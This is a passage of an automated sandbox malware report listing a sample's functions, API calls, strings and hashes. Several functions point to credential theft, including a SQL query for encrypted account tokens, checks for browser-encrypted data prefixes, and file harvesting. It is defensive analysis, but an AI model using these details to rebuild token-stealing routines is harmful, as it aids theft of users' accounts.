                                                                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                                                  • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                                                  Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0090A010,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0090A010,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                                                  • __aulldiv.LIBCMT ref: 00418172
                                                                                  • __aulldiv.LIBCMT ref: 00418180
                                                                                  • wsprintfA.USER32 ref: 004181AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                  • String ID: %d MB$@
                                                                                  • API String ID: 2886426298-3474575989
                                                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                                                  Function 00B14FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B14FEE
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B15017
                                                                                  • lstrcat.KERNEL32(?,00421000), ref: 00B15034
                                                                                    • Part of subcall function 00B14B77: wsprintfA.USER32 ref: 00B14B93
                                                                                    • Part of subcall function 00B14B77: FindFirstFileA.KERNEL32(?,?), ref: 00B14BAA
                                                                                  • memset.MSVCRT ref: 00B1507A
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B150A3
                                                                                  • lstrcat.KERNEL32(?,00421020), ref: 00B150C0
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B14BD8
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B14BEE
                                                                                    • Part of subcall function 00B14B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B14DE4
                                                                                    • Part of subcall function 00B14B77: FindClose.KERNEL32(000000FF), ref: 00B14DF9
                                                                                  • memset.MSVCRT ref: 00B15106
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1512F
                                                                                  • lstrcat.KERNEL32(?,00421038), ref: 00B1514C
                                                                                    • Part of subcall function 00B14B77: wsprintfA.USER32 ref: 00B14C17
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00B14C2C
                                                                                    • Part of subcall function 00B14B77: wsprintfA.USER32 ref: 00B14C49
                                                                                    • Part of subcall function 00B14B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00B14C85
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,0064A524), ref: 00B14CB1
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,00420FF8), ref: 00B14CC3
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,?), ref: 00B14CD7
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,00420FFC), ref: 00B14CE9
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,?), ref: 00B14CFD
                                                                                    • Part of subcall function 00B14B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00B14D13
                                                                                    • Part of subcall function 00B14B77: DeleteFileA.KERNEL32(?), ref: 00B14D98
                                                                                  • memset.MSVCRT ref: 00B15192
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                  • String ID:
                                                                                  • API String ID: 4017274736-0
                                                                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                                                  • Instruction ID: ae96633f70f5b5e0c20da5d5221898da884431ba6d57f5b3b894e7a3a0bcadd0
                                                                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                                                  • Instruction Fuzzy Hash: 9D4197B9A4021467D714F7B0EC47FDD7778AF24701F8044D4B689660C1EEB997D88B92
                                                                                  Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                  • API String ID: 1440504306-1079375795
                                                                                  • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                                                  • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                                                  Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess$DefaultLangUser
                                                                                  • String ID: B
                                                                                  • API String ID: 1494266314-2248957098
                                                                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                                                  Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                                                  • memset.MSVCRT ref: 00409EE8
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                                                  • API String ID: 1977917189-1096346117
                                                                                  • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                                                  • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                                                  • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                                                  Function 00B07837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B07537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B075A1
                                                                                    • Part of subcall function 00B07537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B07618
                                                                                    • Part of subcall function 00B07537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B07674
                                                                                    • Part of subcall function 00B07537: GetProcessHeap.KERNEL32(00000000,?), ref: 00B076B9
                                                                                    • Part of subcall function 00B07537: HeapFree.KERNEL32(00000000), ref: 00B076C0
                                                                                  • lstrcat.KERNEL32(0064A668,004217FC), ref: 00B0786D
                                                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B078AF
                                                                                  • lstrcat.KERNEL32(0064A668,00421800), ref: 00B078C1
                                                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B078F6
                                                                                  • lstrcat.KERNEL32(0064A668,00421804), ref: 00B07907
                                                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B0793A
                                                                                  • lstrcat.KERNEL32(0064A668,00421808), ref: 00B07954
                                                                                  • task.LIBCPMTD ref: 00B07962
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                                                  • String ID:
                                                                                  • API String ID: 2677904052-0
                                                                                  • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                                                  • Instruction ID: f5a4e5c11c7603e1b7a238424a837f1e778a86e0ab68cc837ba4d4f41564fa5e
                                                                                  • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                                                  • Instruction Fuzzy Hash: 7F313C75E40109EFCB04FBE0DC95DFE7BBAEB55301B105198F106A7290DA34EA42CB61
                                                                                  Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                                                  • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                                                  • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                                                  • InternetCloseHandle.WININET(?), ref: 004050C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3894370878-0
                                                                                  • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                                                  • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                                                  • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                                                  • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                                                  Function 00B05217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B05231
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B05238
                                                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00B05251
                                                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B05278
                                                                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B052A8
                                                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 00B052F1
                                                                                  • InternetCloseHandle.WININET(?), ref: 00B05320
                                                                                  • InternetCloseHandle.WININET(?), ref: 00B0532D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1008454911-0
                                                                                  • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                                                  • Instruction ID: e6c8bca099c0b23a82f0bbf5057999c90a48133089bcfaaca672917ace4d2b92
                                                                                  • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                                                  • Instruction Fuzzy Hash: AB3118B8A40218ABDB20CF94DC85BDDBBB5EB48704F5081D9F609A7281D7706EC58F99
                                                                                  Function 00B01577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B0158E
                                                                                    • Part of subcall function 00B01507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B0151B
                                                                                    • Part of subcall function 00B01507: RtlAllocateHeap.NTDLL(00000000), ref: 00B01522
                                                                                    • Part of subcall function 00B01507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B0153E
                                                                                    • Part of subcall function 00B01507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B0155C
                                                                                    • Part of subcall function 00B01507: RegCloseKey.ADVAPI32(?), ref: 00B01566
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B015B6
                                                                                  • lstrlen.KERNEL32(?), ref: 00B015C3
                                                                                  • lstrcat.KERNEL32(?,004262EC), ref: 00B015DE
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B016CC
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B09C53
                                                                                    • Part of subcall function 00B09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09C78
                                                                                    • Part of subcall function 00B09C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B09C98
                                                                                    • Part of subcall function 00B09C27: ReadFile.KERNEL32(000000FF,?,00000000,00B016F6,00000000), ref: 00B09CC1
                                                                                    • Part of subcall function 00B09C27: LocalFree.KERNEL32(00B016F6), ref: 00B09CF7
                                                                                    • Part of subcall function 00B09C27: CloseHandle.KERNEL32(000000FF), ref: 00B09D01
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B01756
                                                                                  • memset.MSVCRT ref: 00B0177D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3885987321-0
                                                                                  • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                                                  • Instruction ID: 26c9f245f0b0e1ca5061658026ef5d92ea4eb1895ccdb2e2f51c81504de9cb73
                                                                                  • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                                                  • Instruction Fuzzy Hash: 585145B19502189BCB19FB60DD92EED77BCAF54700F8045E8B60A62081EE706BC5CF56
                                                                                  Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,009045D8,?,0042110C,?,00000000,?), ref: 0041696C
                                                                                  • sscanf.NTDLL ref: 00416999
                                                                                  • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,009045D8,?,0042110C), ref: 004169B2
                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,009045D8,?,0042110C), ref: 004169C0
                                                                                  • ExitProcess.KERNEL32 ref: 004169DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                                                  • String ID: B
                                                                                  • API String ID: 2533653975-2248957098
                                                                                  • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                                                  • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                                                  • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                                                  • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                                                  Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                                                  • wsprintfA.USER32 ref: 00418459
                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                  • RegQueryValueExA.ADVAPI32(00000000,0090A058,00000000,000F003F,?,00000400), ref: 004184EC
                                                                                  • lstrlenA.KERNEL32(?), ref: 00418501
                                                                                  • RegQueryValueExA.ADVAPI32(00000000,00909F08,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                  • String ID: %s\%s
                                                                                  • API String ID: 3896182533-4073750446
                                                                                  • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                                                  • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                                                  • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                                                  • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                                                  Function 00B04A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A51
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A68
